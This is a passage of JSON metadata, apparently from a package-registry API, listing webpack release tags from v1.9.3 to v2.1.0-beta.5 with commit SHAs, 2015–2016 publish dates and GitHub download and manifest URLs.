beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/ap